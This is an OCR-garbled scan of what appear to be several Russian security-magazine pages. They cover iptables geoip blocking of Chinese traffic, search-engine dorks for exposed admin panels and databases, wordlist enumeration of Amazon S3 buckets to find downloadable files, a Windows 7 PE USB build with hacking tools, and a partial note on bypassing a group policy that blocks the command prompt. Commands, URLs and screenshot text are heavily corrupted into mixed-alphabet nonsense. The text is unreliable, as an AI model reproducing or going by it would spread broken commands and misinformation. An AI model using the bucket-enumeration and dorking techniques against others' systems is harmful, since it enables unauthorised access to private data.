ских |Р-адресов. По крайней мере, в случае 
возникновения подобной ситуации. Для 
этого нужно было обзавестись актуальной 
геолокационной базой данных |Р-адресов 
для определения китайского трафика и 
выбрать решение, чтобы блокировать под- 
ключения по географическому признаку. 
Геолокационных баз данных |Р-адресов [в 
формате «Город/Страна — |Р»] оказалось 
достаточно много, как собранных энтузиа- 
стами, так и профессиональными компа- 
ниями, которые продают их за деньги. Мне 
больше всего приглянулась бесплатная 
М/Р-Вазе от сервиса \\Ртапиа.соги. 
Решение задачи разделим на два пун- 

кта: выбор геолокационной базы данных 
|Р-адресов для определения китайского 
трафика и настройку решения для бло- 
кировки подключений с нежелательных 
|Р-адресов. 

1. Различными энтузиастами и про- 
фессионалами созданы различные гео- 
локационные базы данных !Р-адресов (в 
формате «Город/Страна — 1Р»). Из всех 
предложений, присутствующих в интернете, 
мне больше всего нравится бесплатная 
МЛР-Вазе от МПРтап!а.сот. Она позволя- 
ет неограниченно определять реальные 
физические расположения |1Р-адресов. Она 
абсолютно бесплатна для персонального и 
бизнес-использования, постоянно обновля- 
ется, доступна в ОЕ, СОК, текстовом фор- 
мате и предоставляет ряд фишек: 
 \//Р-АР! (удобный АР! для разработчиков}; 
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® \//Р-Ршиат М/ог(9Р-плагин для Мо2Ща 
Еигефох): 

® \/Р-Мар [показывает |Р-адреса прямо на 
карте]. 

Спектр применения довольно широк: гео- 
таргетинг в электронной коммерции, борь- 
ба с Фродом, фишингом, спамом и мошен- 
ничеством, защита серверов от различных 
видов атак по геопризнаку. Собственно, 
последнее и есть наша задача. 

2. Для того чтобы ограничить трафик 

из какой-то определенной страны, есть 
разные решения. Мы же воспользуемся 
стандартной возможностью 'р{аЩе$, позво- 
ляющей проводить фильтрацию по гео- 
признаку. Кстати, это может применяться 
не только для блокировки нежелательных 
подключений, но и для балансировки 
запросов на разные бекенды, каждый из 
которых обрабатывает свой регион. Нам 
поможет модуль деор из пакета расшире- 
ний хаез-аЧ4опз для |р{а ее, у него свой 
формат геолокационной базы, но к счастью 
\\Мог[@Р-база от \\ИРгпаппа теперь есть и в 
этом формате. Порядок действий такой: 

1. Устанавливаем жаб {е<-аЧ4оп$ [жаб {ес- 
а4оп$.зоигсеюгае.пе{). 

2. Подключаем базу для модуля деор. 
Актуальная версия базы всегда доступна по 
ОВЕ — «айс миртпат!а.сот/&аисЛмог(А!. 
|ртаБ[е$.{аг.д7. Чтобы база обновлялась, ее 
можно обновлять по крону (скажем, раз в 
месяц). 

3. Далее можно настроить правила. 
Блокируем доступ к ВИр-серверу для всех 
клиентов из Китая: 


1рфаб1е$ -А ТМРИТ -р ср --арог* 80 
-т вео1р --згс-сс СМ -) ОВОР 


Справка по Китаю от \\МР-Мар 


1рфаб1е$ -А ТМРИТ -р ср --арог* 80 
-] АССЕРТ 


Можно поступить более радикально и раз- 
решить доступ для клиентов из каких-то 
конкретных стран (например, России, 
Украины и Белоруссии): 


1рфаб1е$ -А ТМРОТ -р ср --арог* 80 

-т бео1р --$гс-сс ВУ, ЦА, ВУ -) АССЕРТ 
1рфаб1е$ -А ТМРОТ -р ср --арог* 80 

-) ОКОР 


Задачу можно было также решить через 
потх с помощью модуля пах_ПЕр_део_ 
тодцще, настроив несколько простых пра- 
вил (подробнее — Би. у/ИНТад). 5= 
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Ргоо-о-Сопсере ‘4 


Когда-то давно мы делились с тобой 
маленькими хаками для поиска различного 
рода файлов через бооце. К примеру, запрос 
« пдех о + тр3_ -№т( -№т -рйр» позволял 
найти огромное количество директорий с тр3- 
файлами. Но это было не самым интересным. 


Главное, что с помощью подобных запросов [сейчас они собраны 
на млм. ехр©(-а6.согп/дооа(е-Чогк$} можно было без труда найти 
оставленные открытыми админки, конфиги, базы данных и тому 
подобные вкусняшки. Тема актуальна и сейчас, но уже не сильно 
интересна. Теперь, когда все идет к тому, что облачные хранилища 
станут основным местом для хостинга файлов, было бы странно 
если никто не попытался бы засунуть свой нос в чужие контейне- 
ры с данными. Первым, кто об этом рассказал, стал британский 
исследователь О1а!\Мт]а, который пощупал сервис Ататоп 53. 

53 расшифровывается как 5итпр(е 5фогаде Зегуег, это простое хра- 
нилище файлов от Аталоп. Если совсем кратко, то этот сервис 
позволяет пользователям хранить сколько угодно файлов и выдер- 
живать сколько угодно большую нагрузку. При этом клиент платит 
за используемое дисковое пространство (от $0,055 за Гб], количе- 
ство запросов к ним ($0,01 за 10 000 запросов}, исходящий трафик 
(от $0,050 за Гб). Пару слов о том, как устроено хранение файлов. 
Любой файл находится внутри так называемого Бискега (концеп- 
туальное понятие контейнера внутри Атагоп 53}, в котором может 
находиться неограниченное количество объектов. Например, 

если объект называется х{о0{2/5саппег.7тр и находится в Бискег’е 
хакер, то к нему можно обратиться, используя УКЕ ВИр://хакер. 
53.аппахопам/$.согп/х{оо(7/5саппег.71р. 

Доступ к БискеГу может быть открытым, а может быть ограничен. 
Помимо этого можно дополнительно разрешить или запретить доступ к 
конкретному объекту. Например, если какой-то файл могли скачать все 
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желающие, то у него должны быть права для чтения — «АЦ». 

Что сделал О9!Мт]а? Он создал в своем аккаунте $3 несколько 
БискеГов, открытых и закрытых, с различными правами доступа к 
объектам, после чего изучил ответы сервера при обращении к ним. 
Ответ для закрытого контейнера: 


т ЕРВОЕ > 
<Соде>Ассе$Бептеа</Соае> 
<Мез5аве>Ассе$$ ПБептеа‹< /Ме$5аве> 
<Кедие{Та>7Е3987394757439В< /Кедие ЕТа> 
<Но5&Та>кумтикрома+) гиЕЕа1гКАт3 83 7пАпи1уК$Тх\у7+/ 
СТНамВсагх\2 =г+ЕчАЕУр< /Но5ЕТа> 

< ЕРВОГ > 

Риб11с Биске* 


Ответ для открытого БискегГа: 


<Е15{ВискееКези1{ хт1п5="П р: //$3.атахопам$ . сот 
/40с/2006-03-01/"> 

<«Мате>а151риб11с< /Мате> 

<Ргеях>< /Ргейх> 

<«Магкег>< /МагКкег> 

<МахКеу$>1000‹ /МахКеуз > 

<Т5Тгипсафеа>+а15е< /Т5Тгипсаеа> 

<Соптепт$ > 

<Кеу>ту_#1е</Кеу> 
<Еа${МоЧ1#Аеа>2011-05-16110:47:16.0007< /ГазЕМоа1Яеа> 
<ЕТаз>"51+++3с9087648822с0а21212907934а"</ЕТав> 
<517е>6429< /$17е> 
<5фогавеС1а$$>5ТАМОАКОБ< / $огадеС1а$$> 
</Сопфепф$> 

< /115{Виске*Кези1* > 


Для закрытого Биске!’а сервер возвращает ошибку (Ассе$$ 
Оеп!е4)}, а для открытого — список файлов. Теперь посмотри на 
ОКЕ, с помощью которого производится обращение к БискеГу 
[ФБчске пате%.$3.атагопа\м/5.сот] — имя подставляется 
прямо в УКГ. Получается, мы без проблем можем взять м/ога|${ 
и проверить существование БискеГов с такими именами, заодно 
узнавая их статус. Для открытых контейнеров можно сразу 
получить еще и список файлов, правда, это не значит, что они 
доступны для скачивания [этому могут препятствовать права 
доступа к конкретным объектам). Но обращаясь к каждому из 
объектов, можно изучить ответ сервера: «403 РогБ!44еп» [доступ 
запрещен} или «200 ОК» [доступ разрешен). 

Таким образом, легко составляется список файлов, доступных 
для непосредственно загрузки. В результате 019!Мт]а набро- 
сал на КиБу простой сценарий Виске{ Еттдег (\млллм. Чата. 
ога/рго]ес{5/бискеЕ НпдегрВр], реализовав описанную идею. 
Ради эксперимента парень взял \м/ога${ с наиболее часто 
используемыми именами пользователей [2226 слов} и с помо- 
щью этого скрипта прошелся по нему. В итоге нашлось 848 
закрытых и 131 открытых БискеГ ов. Для загрузки при этом 
было доступно 9683 файлов, среди которых оказались и поль- 
зовательские базы, которые в открытом доступе быть ну никак 
не должны. 22 
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\ММпаом/$ 7 


УИпооми$ 7 РОВТАВЕЕ 


Делаем загрузочную флешку с «семеркой» на борту 


Наша задача на сегодня — создать специальную сборку \\Ип@о\$ 7, 

которая бы работала без установки и запускалась прямо с флешки. 
Включив в ее состав необходимый софт, мы сможем решать разные 
задачи: решать проблемы с дисковыми разделами, удалять вирусы 
или, кпримеру, использовать хакерские инструменты в привычном 


окружении. 


Давно смекнув, что многие проблемы гораздо проще решать, загру- 
зившись с /уе-носителя, я стараюсь всегда иметь при себе на флешке 
какой-нибудь гесоуегу-дистрибутив. Согласись, что это если не луч- 
ший, то, по крайней мере, один изудобнейших способов восстановить 
систему или, к примеру, расправиться с малварью [особенно если речь 
идето блокираторе]. Я перепробовал многое. Сперва это были системы 
на базе !пих, затем УВСО4\\/ п, построенный на базе \\Лп9ом/з ХР, а 
потом я сделал свою собственную сборку, используя небезызвестную 
утилиту Ваг!'$ РЕ ВиЦдег [млмм.пи2.пи/рери(9ег). Увы, прога давно не 
обновляется, а, значит, в качестве список поддерживаемых систем, 


доступных для переноса на загрузочный носитель, остается по- 
прежнемутем же: \\Мпао\/ 2000/ХР/2003. Это немного огорчает: уже 
все успели привыкнуть к «семерке», и было бы здорово собрать свою 
загрузочную систему именно на базе \\Лп9о\м/$ 7. Сказано — сделано. 


Наш помощник — \ЛЛпВийаег 


В замену РеВи{9ег нашелся другой, совершенно замечательный 


инструмент — \/пВиЦаег. Это даже не программа, а настоящий фрейм- 
ворк для создания М/пдом/$ РЕ [так называется облегченная версия 
ОС М/пдом.<, которая позволяет загружаться со сменного СО/О\УО/ 
Ц5В-носителя). Для этого он извлекает нужные компоненты из дистри- 
бутива самой системы, а также набора \\п9ом/5 Ащотаед п${аЦа{оп 
Ки (М/А!К] в качестве основы для системы и позволяет создавать 


› 034 


дополнительные скрипты, с помощью которых в систему встраиваются 
любые сторонние утилиты. 

На базе \\/пВиЦаег построено несколько проектов, вотлишь некоторые 
из них: 

® | уеХР — использует в качестве источника файлов \\Лп9о\м/5 ХР и 
создает систему для администраторов. 

® \\Лп7РЕ — берет за основу системы дистрибутив \МЛп9 ом 7. 

» \\5<аРЕ-САР|! — создает сборку на основе \$а. 

® Мана УРЕ — основывается на \\/п4о\м/$ ХР и из коробки поддержи- 
вает воспроизведения медиа-файлов. 

е МИРЕ — собирает загрузочную систему из дистрибутива Ма или 
МММпдом/$ 7. 

Мы же будем использовать \\п'7РЕ, как самый проверенный и наи- 
более подходящий для наших задач проект. 


Что нам нужно? 


Для того, чтобы собрать загрузочную систему на базе \\пдо\з 7 нам 
понадобится следующее: 

1. Дистрибутив М/пдо\м\® 7 х86 или хб4, желательно суже интегрирован- 
ным РТ. 

2. Последняя версия \МИпВи(аег [лиру 9егпе{. Он распространяется 
в виде небольшого ехе-файла, а необходимые для работы компоненты 
и вспомогательные утилиты дополнительно загружает из Сети. 
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ЗВ весь Юбеа ве ЧЕ, Е В о балы 


\М/ексоте фо УАпВийдег! 


Ном оаий. 


мн реет: Ноолата Ко В иь ас И 
увиг Ориеебсьлья, Або, фоне Корней: Все Комо Конг Инь рр: аси рия 0 


В И в 


Бу рагаоынег [18 герые] 
Реане неНЕ Ее Рос и зав Во Фоты 


Выбираем компоненты для загрузки 


3. М/паоми5 Ащотаеа п$аЦаноп КИ Ююг\У/Итпаоми$ 7 (МАИК). 
Пакет для автоматической установки \\пдо\м/$ весит 
очень немало — это образна1,7 Гб, который ты можешь 
либо выкачать с сайта М'сгозой (6(.1у/ро№п7!), либо взять 
с нашего диска. 

4. Опуеграск’и (Чуеграск$.пеУдгмеграск®Ла{е®) — 
классные наборы драйверов, которые поддерживают 
огромное количество железа. На сайте доступны сборки 
для различных видов девайсов, нам понадобится нетак 
много, а именно — сборники для категорий СПирзет, ГАМ, 
МАМ Ма$$ Зогаде ануег. 


ре едварительные 
и готовления 


ор все файлы будут в нашем распоряжении, можно 
приступать к приготовлениям. 

1. Для начала нам нужно установить \\Лпдом/5 Ащотаеад 
|п${аЦаноп КИ Тог\М/помиз 7. Записывать на болванку 
15О’шник, само собой, не обязательно: можно просто рас- 


паковать файлы из КВЗАК_ЕМ.150 и запустить Чай СО.ехе. 


В появившемся меню автозапуска выбираем \\/п9ом/5 АК 
Зе@ир и выполняем самую стандартную установку. Весит 
это хозяйство много, но после того, как скрипты УИпВицЦаег 
извлекут оттуда нужные файлы, \\/А!К можно будетудалить 
(имей это в виду.. 

2. Далее копируем файлы \МИпдом/$ 7 сдиска или из [50- 
образа в какую-нибудь директорию. 

3.Размещаем загруженный \/пВиЦдегехе в какой-нибудь 
папке [например, С:\\/пВи аег) — лишь бы не вдирек- 
тории спрофайлом пользователя. И запускаем бинарник 
под аккаунтом администратора: иначе программа честно 
предупредиттебя о возможных проблемах. 

4. От\/пВицаега в чистом виде толку мало — ему необхо- 
димы сценарии и вспомогательные файлы для создания 
загрузочного дистрибутива. Поэтому первое, чтоты 
увидишь после запуска — это «Оомип{оа9 Сег{цег». Прога 


предложит выбрать проекты, которые необходимо Скачать, 


Отмечаем галочками: 

® ирда(е$.6оо{-[ап4.пе{ (это апдейты); 

® млп7ре./\/МиВи(Чегпе!5Е (файлы проекта М/Ип7РЕ]. 

В левом верхнем углу можно выбрать режим загрузки [по 
умолчанию он выставлен в значение «Ресоглтепае4»)}. 
Выбираем через меню «Сотр(е» и начинаем загрузку 
файлов, нажав на кнопку «Оо\м/п(оаа». 

5. По какой-то причине \МИпВиЦ9егне может корректно 
извлечь абсолютно все файлы, необходимые для создания 
сборки, поэтому придется поработать немного руками. 
Необходимо найти файл БсаедЦК.ехе в своей системе 
[Мп9о\м/$ 7} и скопировать его в С:\ММпВи(дег\Рго]ес{<\ 
Тоо(5\ММт7РЕ_$5Е\х86 [или С:\\ММпВицаег\Рго]есЁз\Тоо($\ 
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>, МЛпаом5 7 


\Ме]соте го МЛпдомс Аиботабед ТпГайабоп КИ 


Тре Улядомия © Ашотаве Те баваног КА: (Илиомев АТК) Бер уси №ю 
Алисии 


5егуег® 2008 В 2 орегабло зузетз. 


_То пл Ме Млпдомз АТК, зесблзап 


аиболииге, сопбоиге, эп дерюу Не Лидо 7 апа 


сотрийег плиз ие Ме 


усиг 
МАпдолуя бегуег® 2003 5Р1, Млпаониз Меба® $Р1, МЛпдомге Зегуег 
_2008, Модем 7, ог \МЛпфомиз Зегуег 2008 2 орегапд зузет. 


Устанавливаем \\МАК 


\Мп7РЕ_$Е\х64 для 64-битной системы). Туда же нужно 
скопировать следующие файлы: 


1тарех.ехе 
и1тбар1 .а11 
иТитомие . Ти 
ититомие . $у$ 
м1тзегу.ехе 


Изначально они находятся в папке \/А!К. Можно попробо- 
вать не выполнять этот шаг. У меня автоматические скрип- 
ты \МЛпВиЦаегне смогли сграбить эти файлы, но возможно 
тебе повезет больше. 


Собираем дистрибутив 


Теперь, когда все необходимое для сборки унасесть и го- 
тово киспользованию, нетсмысла затягивать с созданием 
дистрибутива. Опять же раскладываю все по пунктам. 

1. Итак, в левой панели мы видим дерево проекта \\/п'7РЕ 
ЗЕ. Нажимаем но кнопку «5оугсе»: здесь необходимо 
указать расположение файлов дистрибутива \\Ип4о\$ 7. 
Все остальное можно оставить по умолчанию. 

2. Далее необходимо подключить к созданию сборки драй- 
веры, которые будет использовать система. Это делается 
в разделе «Огмуег$». По умолчанию здесьуказан путь 
%СюраПетр(={ез%\Онуегз_х86. Проще всего нажать на 
кнопку «Ехр(оге» и в появившуюся папку скопировать все 
необходимые драйвера. Просто распаковываем сюдаар- 
хивы ОпуеграскК`ов, которые мы предварительно скачали. 
Так как поддерживается сканирование поддиректорий, 
то пихать все в одну сумасшедшую кучу необязательно: 
смело размещай содержимое архивов «какесть». 

3. Если пройтись по разделу «Т\меаК$», то можно допол- 
нительно внести различные косметические настройки 
будущей системы. К примеру, изменить маЦрарег, настро- 
ить меню «Пуск», изменить ярлычки. Все очень понятно 
настраивается через соответствующие опции. 

4. Далее переходим в раздел «\\/г(еМед!а» и активируем 


режим «Сору{о У$В-Пемсе», чтобы сразу разместить нашу 


сборку на У$В-флешку, выбрав в меню нужный носитель. 
5. Теперь можно нажать на кнопку «Р(ау» и верить, что 
все пройдет без сучка и задоринки. Создание сборки, 
очевидно, занимает некоторое время: в процессе можно 
наблюдать, как выполняется один скрипт системы за 


[2уо 


› Чуа 


Весь необходимый 
набор компонентов 
для создания за- 
грузочной системы 
ты найдешь на нашем 
диске. Само собой, 
кроме дистрибутива 
МИп9ом/< 7. 


Е 
Пе] 


® Полезные плагины: 
Амга Апи\Мтг: 
геБоо+.рго/14817. 

® Ма\/агебу{е$' Апй- 


Мамаге: 
гебоо*.рго/9 351. 
® ба[а’5 Раз$\/ога 


Кепем/: 
героо{.рго/2 720. 


> 035 


@) биль4Ро$ пза!ег 1.1 


[696] (83820М] 
с Не | Втоузе | 
Ра 5:  |\м/пое 95К (МВ) = Рей | 


Г` бауе етЬедед СРЕОВ.МВА 


ОрНом$- 

Г ПВеад опу тоде Г  Уефозе ощри 
Г` М Баскир МВА 
Г ОкаЫе Р'еуМВВ 


Г. @мь?2 


№ Поп" зеагсй Йорру 
Г` Ремоиз МВВ виз! 


Г` Рорру таде 


Ттеоцщ Но Кеу 


[оад 5е9 Вос! Ее 
мнаннананинннанания: 


Ехна 


Резоге 
бауе Ее Втоммзе | 


Г  Везюге Кого РгеуМВА 


Г ПВезюоге Ног Не 


те | за! _ | _ ба | 


Заливаем на флешку загрузчик 


К ет О Вы 


0} МИпРЕЗЕ х 
61184005 8.924 2А89-И5ЕРЗ ИВА 


гы отв или лики 


МУР | 

МелТезф86+ 4. 28. Е 

Ей Побомы$ ЧАНГ — 

рим ата Гоа НТО ог те ы 
Е! ап Гоай СНГЛН ОЕ НИмовЕ "НТУ2НУХР 

Г1п@ ап@ Тоай 10.555 ог Н!иаосз Энйме т ПЕ 
Гтпй ап Бооф Сим УР меги. 15 а]геадо лата ТИ 
ЕЛорри СРЯЯ? 

Сопмаи Е. ле 

Нео 


На 11 


фо Веое. 


а соапаий- | 18 


ев Т ап@ + Керз Фо НИМИ ап его. Ргазс ЕНТЕЙ ог №’ 
'’ То а Те сопматз БеГоге 6001119, ог ‘с’ Гог 


\. 


Проверяем сборку под УМ\маге 


другим (сложно представить, сколько времени ушло бы на выпол- 
нение подобной работы вручную). Соответственно, чем больше 
скриптов ты выбрал для выполнения, тем дольше будет возиться 
\М/пВицадег В случае ошибки прога сообщит в чем проблема и, скорее 
всего, выдаст в браузере справку с возможным решение проблемы. 
Эту инструкцию я составляю сучетом всех возникших у меня слож- 
ностей, поэтомуты не должен наступить на мои грабли. Все должно 


> 036 


[2] миавыйве [080] 


Ргосеззта струе... 


АЛ ревсвей зспоее ге Вл реосеееЯ, раза ига ОГ 9$ РЕбегсв © сОПОВЬЯ, АЙЫН Е сопеАла ее СКАЕ вар иоы 
сап мелм ппоге Чебаве Я ибомтта юлия пизде Вне №50 ВаБ, 


4 - Сгеме 150 [4-50.5с р] 


СагпрИе сиггеги: сопрано ол Вне БыгоеЕ Филесвогу № вп 150) ва 
о5И пе Р5 


43/ 46 Арма" 19 


РАНЕЕ 


сгааиту 150: [2А\_хабер\иивыйдег \\АпвиНет\ 15 О\ММ7РЕ_х86.150.] РоЧег &ее: 
329,13 МЬ 


Ребогеяя 


прпрониии < 
Е ы 
Поста $ — Слорость: ПОбобитие] [ВАС ОСИНА | 


Настройка сети 


быть хорошо, и на выходе ты получишь файл \\\п7РЕ_х86.150 в папке 
ММ пВиЦаег\!50. 

6. Прежде чем загружать файлы на флешку, можно предварительно 
проверить работоспособность сборки в виртуальной машине, и здесь 
опять же все автоматизировано. В разделе Уп{иа Пе можно выбрать 
систему виртуализации (испытание можно устроить, воспользовав- 
шись аЕгпи, Упиа[Вох, М“иа(РС, УМ\умаге). Я оставил режим по умол- 
чанию [Ве>{ Етщай оп}, и ММпВи(Чегзапускала получившийся образ 
вустановленной УМ\//аге \Могк$аоп, что меня вполне устраивало. Ты 
же можешь выбрать более подходящий сценарий. Можно оставить все 
какесть и установить в систему бесплатный и легковесный. 

/. Теперь отом, как выглядит перенос системы на флешку. Снача- 

ла \\/пВиЦаегзапускает НР У$В О1$К ЗХогаде Еогппа{ Тоо{ — самую 
правильную утилиту для форматирования УЪВ-носителей. Выбираем 
здесь ГАТЗ?2 (если хочешь в будущем добавить возможность загрузки 

с флешки другой системы] или МТЕ$. Форматируем. После этого в игру 
вступаетутилита бгиб4Оо$, у которой важное назначение — устано- 
вить на флешку загрузчик. Гут необходимо: во-первых, правильно 
выбрать диск (так как буквы не отображаются, смотри внимательно на 
размер}, во-вторых, выбрать в качестве значения параметра «Раг( |< 
— \\МПо[е а1$К [МВК}› и отметить галочкой опцию Ооп"{ зеагсй Цорру. 
После этого остается нажать на кнопку «!п${аЦ», моментально по- 
лучить сообщение об установке загрузчика и, мысленно поблагодарив 
СБиг4Ооз, закрыть его окно. Все: после этого \\ИпВиЦаегоперативно 
перенесет все файлы на УЪВ-носитель. 

Наша загрузочная флешка с \\пдо\\® 77 готова. 
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Несколько советов 


1. Какя уже упомянул, в качестве исходного дистрибутива лучше 
взять образ \\Ип4о\/ 7 суже включенным пакетом обновления 
(5Р1). С использованием дистрибутива, в котором сервиспака еще 
нет, возникли проблемы с нахождением некоторых библиотек. Хотя, 
оговорюсь, это некритично, потому что \\ИпВиЦаег выдает конкрет- 
ные способы решений проблемы. 

2.В случае каких-то проблем скрипты, как правило, выдают 
ошибки. Если же что-то пошло нетак, но в чем именно проблема 
непонятно, помогут логи. Опция активируется в сценарии «Е'па|те 
—> ба\уе (09 Ще» и включена по умолчанию. Логи \\ИпВиЦаегпишет 
очень подробно: можно полностью изучить процесс создания сбор- 
ки, проследить логику выполнения скриптов и в случае какой-то 
проблемы попытаться устранить ошибки. 

3. Опциональным, но очень полезным проектом является ммм. 
рагадИЧегпс.сот ЛМ пВи{9ег [рекомендую его сразу выбрать для 
загрузки во время первого запуска \/МпВи{Чег). Он включаетв себя 
подробнейшую инструкцию по созданию сценариев. После уста- 
новки ищи его в папке Рго|ес{°\Рагад(Идег\\М/ИпВи(аег.сЬ т. 

4. Самый простой способ включить в сборку приложение — это 
найти ее РоцаЫе-версию (например, на сайте ро“аЦеарре. 
соп1], которая уже включает в себя все необходимые файлы для 
работы в «чужой» системе. 


Тутуже грех загрузиться с У5В-носителя, чтобы убедиться, что система 
работает не только в виртуальном, но и в настоящем, самом обычном 
окружении. Но хочу сразу предупредить: это сильноурезанная вариация 
\МЛпаом/5 7, в которой оставлено минимум компонентов. Никакихтебе Аего 
и красивых эффектов: все это отключено. А из софтаты поумолчанию 
получаешь некоторые стандартныеутилиты М/Ипдо\\и$ [вроде гедед а}, 
атакже несколько бонусных программ вроде РЕМе\могК для настройки 
сети (втом числе беспроводного адаптера] и Орега Ц$В для браузинга. 
Все это неплохо, но явно недостаточно — систему нужно снарядить. 


Скрипты (плагины) 


Дополнительные программы, которые можно включить в состав своей 
сборки системы, распространяются в виде скриптов (или плагинов — так 
их тоже называют). Подключить их просто. Достаточно скопировать ихв\ 
\МпВицаег\Ргоес\\М/п7РЕ_$Е\Аррз и потом активировать через СЦ|- 
интерфейс \\/пВшаег Правда, чтобы они появились в дереве скриптов, 
программу приходится перезапускать, хотя не исключаю, что обновить 
список плагинов можно как-то проще. В некоторых случаях плагин рас- 
пространяется в виде единственного файла — сценария. Гутесть два 
варианта. Разработчик могвключить необходимые файлы прямо в этот 
файл, закодировав их в Базеб4. Или же в составе скрипта никакие файль 
не включены, и ихнужно скопировать в папку со сценарием самому (это 
должно быть подробно описано в мануале плагина]. Последнее особенно 
касается коммерческого софта [того же самого Та! Согптапаег а), файль 
которого разработчики плагинов просто не имеют права распространять. 
Теперь отвечаю на наверняка возникший утебя вопрос: «А где взять 
эти плагины». Есть множество источников — например, отсюда: 

® форум КеБоо\*.рго'$ Арр 5сг!рЕ$ [героо{. рго/югиго/65} 

® коллекция скриптов А(./о’5 (а|-|о.99К.ога). 

К примеру, можно скачать плагин \МгезВагК и необходимый для его 
работы \МИпрсар (доступны отсюда: гебоо{.рго/1 4842). Перемещаем его 
в каталогАрр/Ме{м/огк, активируем через дерево — иунас получается 
сборка с полноценным сниффером. Ссылки на некоторые полезные 
плагины я привел в боковом выносе. 

Несмотря на то, что готовых плагинов довольно много, полезно уметь 
самому написать скрипт для добавления нужных программ в систе- 
му. Когда добавляешь новый скриптчерез «Тоо($ -> Сгегце эспри...», 
\МЛпВиЦаег предлагает простой шаблон скрипта. Для примерая приве- 
ду простенький сценарий, который устанавливает 5оКрегес{ Мессап 
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ЗАлоплнуаре (45.0) лилия пы Ромул 


Снеск ИЛгпаар. О АЕ, гесогтитьел ед Гог АЛ РО ог реесЕ ие ор "Агния сое МАМ сот Отто билету зола" 1 


Ейизо... 


Устраняем ошибки 


[млллм/.<оНрег ес. соп/ргодис($/пеймогк$саппег), и поясню логику с 
помощью комментариев: 


//Секция с информацией о добавляемом приложении 
[ма1п] 

1Т1{1е=М№е $ сап 
Оезсг1р1оп=Меф$сап Фгом 5орег+ес* 
$е1есфей=Тгие 

Ееуе1=5 

\Мег51оп=1 

Момагп1п&=Ра15е 

Боип1оаа_1е\уе1=0 


/ /Важные переменные, включая путь до исполняемого файла 
[Уаг1аб1е$ ] 

%РговгаттТ1{1е%=Ме*5сап 

ЖРгозгатЕХЕ%=пе*5сап.ехе 

ЖРгоёгатЕо1аег%=пеф{$сап 


// Команды для установки приложения 

[ргосе$°$ ] 

// Копируем нужные файлы из поддиректории пеф$сап в папке, где 
находится скрипт (сюда нужно предварительно перенести 
необходимое для работы программы) 

СоруРгоёгат, %5сг1рЕ01г%\%РговгатЕо1аег% 

/ / Добавляем ярлыки 

АЧа_$Погесит , $Фаг{Мепи ,Меф5сап 

АЧа_$Погтсит ,БВезКфор , Ме 5сап 

/ /Указываем ОЕЁ?ки, которые необходимы для работы программы. 
М1пВи11аег включит их в сборку 

Веди1ге_Е11е0 , помфар1.а11 

Веди1ге_Е11е0 , мзусг®.а11 

Веди1ге_Е11е0,КЕКМЕЕЗ2.. 911 

Веди1ге_Е11е0, зптрар1 .а11 

Веди1ге_Е11е0,0$ЕВЗ2.411 

Веди1ге_Е11е0,мМ52_32.411 

Веди1ге_Е11е0 ,мзптр32.а11 


Огромное количество скриптов доступно на форуме геБоо\*.рго, их 
можно посмотреть как примеры и использовать в качестве основы. 
Влюбом случае, ничего сложного в создании своих сценариев нет. 
Если есть необходимость просто добавить какие-то файлы в сборку, то 
необязательно для этого создавать плагин. В этой ситуации поможет 
раздел «Сотропеп($ -> А4ЧИюпа[ ЕЦе$», который необходим как раз 
для такой ситуации. Если нажать на кнопку «Отес{огу Ехагпр(е», то ты 
увидишь структуру папок, используемых в сборке, чтобы понимать, 
куда именно будут добавляться файлы. 


Что у нас получилось? 


Насколько хорошо работаеттакая система? Очень хорошо! При загрузке 
на моем ноутбуке, сразу цепляются необходимые драйвера, втом числе 
для беспроводного модуля. Таким образом, уменя сразу есть выход в 
Сеть. Все программы, если их правильно интегрировать (то есть, вы- 
полняя все их зависимости], наура запускаются и работают. А это и софт 
для восстановления системы, работы стаблицами разделов, бэкапа, 
редактирования реестра, атакже хак-тулзы. В конце концов, что может 
быть удобнее в качестве вспомогательной системы, которую можно 
всегда брать с собой и в случае необходимости с нее загружаться? == 
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Ш № Тюрин «СгеепОод» Алексей (адггг4од@дтай. сот) 


ЗАДАЧА: РАСШИРИТЬ ПОЗНАНИЯ 
В ОБЛАСТИ ИНФОРМАЦИОННОЙ 
БЕЗОПАСНОСТИ. 


РЕШЕНИЕ: 


Знания— сила, с этим трудно поспорить. Знания во многом основы- 
ваются на впитываемой нами информации. Последняя должна быть 
актуальной и достоверной. Где же взятьтакую? Сейчас очень многое 
можно почерпнуть с сайтов всевозможных секьюрити компаний ис 
блогов различных спецов. Но их количество очень велико, особенно 
еслитебя интересуют какие-то конкретные направления, не говоря уже, 
что ресурсы сильно разнятся по качеству. В общем, примерно натакой 
мысли был организован проект по обмену букмарами— Б\.1у/ВРЕСА(. 

На нем сейчас представлено большое количество закладок на самые 
различныетемы, можно добавлять и свои. Что приятно— мониторят 
данный проектхорошие секьюрити-специалисты из известных компа- 
ний, так что за качество можно не беспокоиться. 

Крометого, так какданный выпуск рубрики получился во многом 
уиеб-ориентированным, предлагаю еще один соответствующий линк. 
егегглиаВ Сбго$$ппап— широко известная вузких кругах личность. И он 
каждый год [на протяжении последних пяти лет] проводит конкурс «Тор 
Теп Ме Насктд Тесбтиез» [5 И.у/ого(ХЕ 7]. Последние призы: проход- 
кана конфу О\М/АЗР‘а В аскНа{ ЦЗА и пучок книг. 

Здесь важно отметить, что в список в основном попадаютне конкретные 
баги каких-то продуктов, а именно новыетехники и векторы, что более 
интересно. Но для нас главное то, что мы можем почерпнуть оттуда це- 
лый мешок всего интересного. Многое из описанного в рубрике как раз 
было почерпнуто из этого списка. 


ЗАДАЧА: ОБХОД ГРУППОВОЙ ПОЛИТИКИ 
НА ЗАПРЕТ КОМАНДНОЙ СТРОКИ. 


РЕШЕНИЕ: 


Вернемся к обсуждению темы обхода групповых политик винды, 
начатой в прошлых номерах. Напомню: групповые политики это, 
по сути, набор дополнительных ограничений [помимо ограни- 
чений прав доступа к объектам ОС) для обычных пользователей, 
выставляемых админом. 

Сегодня мы коснемся политики— запрет доступа пользователей 

к командной строке. На практике я ее не встречал, но вот способ 
обхода такой забавный, что я не могне написать :). Материал был 
взят с ммм. есиг(уаед!:.согп. Итак, давай посмотрим, что это за 
политика: 


1) $фагЕ -> Вип -» вред1{.т$с; 
2) Чзег Сопйвига1оп -» Адт1п1$ЕгаЕ1уе Тетр1а*ез; 


3 )зуз{ет -> РгеуепЕ ассе$$ Фо {Пе соттапа рготре. 


Суть ее втом, что пользователь не может запускать ста.ехе и Ба{-/ 
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в —- 


+)». `@} нирыигсове, дооофе ово руля -во скилы Вос 


Закладок много-много: читать — не перечитать 


Ум": 


а СИН ВАРВЕН Рб рун 2х 


БН ая Г РыЫ те ДЫБЫ 0 
Ва сори. 


